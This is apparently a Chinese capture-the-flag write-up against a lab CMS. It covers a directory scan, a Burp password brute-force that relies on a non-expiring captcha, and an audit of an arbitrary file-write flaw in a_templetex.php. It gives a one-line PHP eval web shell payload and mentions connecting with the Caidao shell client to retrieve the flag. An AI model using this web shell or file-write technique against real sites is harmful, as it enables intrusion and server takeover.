靶场地址
http://59.63.200.79:8020/
- 简单的做一个目录扫描

image
发现后台登陆界面
http://59.63.200.79:8020/cmsadmin/a_login.php
-
尝试登陆抓包,,重放数据包发现验证码未失效;
image -
burp密码爆破
image - 网站时开源CMS,下载源码进行代码审计

image
<?php
require_once 'a_top.php';
$t=UsualToolCMS::sqlcheck($_GET["t"]);
$x=UsualToolCMS::sqlcheck($_GET["x"]);
if($x=="m"){
$filename=$_POST["filename"];
$dir=$_POST["dir"];
$content=$_POST["content"];
$id=UsualToolCMS::sqlcheckx($_POST["id"]);
$tp=$_POST["tp"];
$contents=iconv("utf-8","utf-8",$content);
$filenames="../".$dir."/".$filename."";
file_put_contents($filenames,$contents);
echo "<script>alert('更新模板成功!');window.location.href='?t=edit&id=$id&filename=$filename&dir=$dir&tp=$tp'</script>";
}
?>
在a_templetex.php页面时
当传参x=m时进行模板更新,文件名为filenames传参,内容为content传参
filename=zzz.php&content=<?php eval($REQUEST[a]);?>

image

image
- 使用菜刀连接

image

image
得到flag{sdcms_tm}

